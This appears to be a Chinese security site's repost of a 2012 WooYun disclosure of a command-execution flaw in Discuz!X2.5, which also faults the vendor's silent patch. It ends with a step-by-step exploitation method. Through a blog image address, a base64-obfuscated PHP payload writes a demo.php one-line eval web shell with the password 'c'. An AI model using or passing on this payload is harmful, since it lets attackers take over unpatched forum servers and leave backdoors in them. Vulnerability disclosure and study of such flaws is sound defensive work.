热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Discuz!X2.5 Release20120407版命令执行漏洞Getshell

发布时间:2012-06-10 22:31文章来源:wooyun文章作者:kobin97 点击次数:
摘要:漏洞作者: kobin97 提交时间: 2012-04-26 公开时间: 2012-06-10 漏洞类型: 命令执行 简要描述: Discuz!X2.5Release20120407版命令执行,官方4月13号更新了,但没提示更新内容和后台没提示升级!大家使用旧版本的自己赶快升级吧! 详细说明: Discuz!X2....

漏洞作者: kobin97

提交时间: 2012-04-26
公开时间: 2012-06-10

漏洞类型: 命令执行

简要描述:

Discuz!X2.5Release20120407版命令执行,官方4月13号更新了,但没提示更新内容和后台没提示升级!大家使用旧版本的自己赶快升级吧!
详细说明:

Discuz!X2.5Release20120407版命令执行,官方4月13号更新了,但没提示更新内容和后台没提示升级!

今天无意看了一下官网版本,发现更新了
http://www.discuz.net/thread-2744369-1-1.html
于是对比,发现修复了重要漏洞!但进入旧版后台没有任何提示升级。更新也没有说明作了那些修改。个人觉得这是个对用户不负责的行为!

具体不说,看图吧:
漏洞文件:upload\source\class\helper\helper_seo.php
只要后台设置了,前台就能通过添加特殊内容进行命令执行。

 

漏洞证明:

Discuz!X2.5Release20120407版命令执行
Discuz!X2.5Release20120407版命令执行
Discuz!X2.5Release20120407版命令执行
Discuz!X2.5Release20120407版命令执行
Discuz!X2.5Release20120407版命令执行
 

利用方法
1.注册任意账户
2.登陆用户,发表blog日志(注意是日志)
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志,论坛根目录下生成demo.php,一句话密码C

标签分类:

上一篇:5Ucms网站源码存在后门
下一篇:海纳个人博客系统 后台认证漏洞